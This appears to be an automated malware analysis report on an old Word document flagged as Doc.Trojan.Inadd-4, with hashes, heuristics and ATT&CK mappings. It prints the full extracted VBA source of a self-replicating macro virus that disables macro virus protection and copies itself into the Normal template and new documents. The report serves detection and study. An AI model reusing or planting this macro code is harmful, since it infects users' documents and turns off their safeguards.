Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 397807c34b890482…

MALICIOUS

Office (OLE)

26.5 KB Created: 2000-08-23 21:42:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 5c72aa2e8c2b25605f2f3491bb34ab3e SHA-1: 17be7e20859a8a12a08f0ef6ed1260aeacef3374 SHA-256: 397807c34b890482fc7b5b909d7ec0e48d25bccb32fc1b8f0a3b9839f24f4c72
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Word document containing VBA macros, specifically a Document_Open macro designed to infect the Normal template. This infection mechanism suggests an attempt to achieve persistence by ensuring the macro runs with future documents. The macro code itself is designed to copy its own content into the Normal template if it's not already present, and to save the active document if it's the Normal template itself, indicating a self-propagation or persistence strategy.

Heuristics 3

  • ClamAV: Doc.Trojan.Inadd-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Inadd-4
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1189 bytes
SHA-256: 1665b31d768937b3413471b0dde663a84c1d2dea733acbd94f4371108b7b8777
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Options.VirusProtection = False
Options.SaveNormalPrompt = False

If MacroContainer.FullName = NormalTemplate.FullName Then Set Infect = ActiveDocument.VBProject.vbcomponents(1).codemodule: SaveIt = 1
If MacroContainer.FullName = ActiveDocument.FullName Then Set Infect = NormalTemplate.VBProject.vbcomponents(1).codemodule
If Infect.countoflines < 1 Then Infect.addfromstring MacroContainer.VBProject.vbcomponents(1).codemodule.lines(1, MacroContainer.VBProject.vbcomponents(1).codemodule.countoflines)
If SaveIt = 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, Fileformat:=wdDocument

Payload:

End Sub

Private Sub document_new()
Set Norm = NormalTemplate.VBProject.vbcomponents(1).codemodule
Set Active = ActiveDocument.VBProject.vbcomponents(1).codemodule

Active.addfromstring Norm.lines(1, Norm.countoflines)
ActiveDocument.Saved = True

End Sub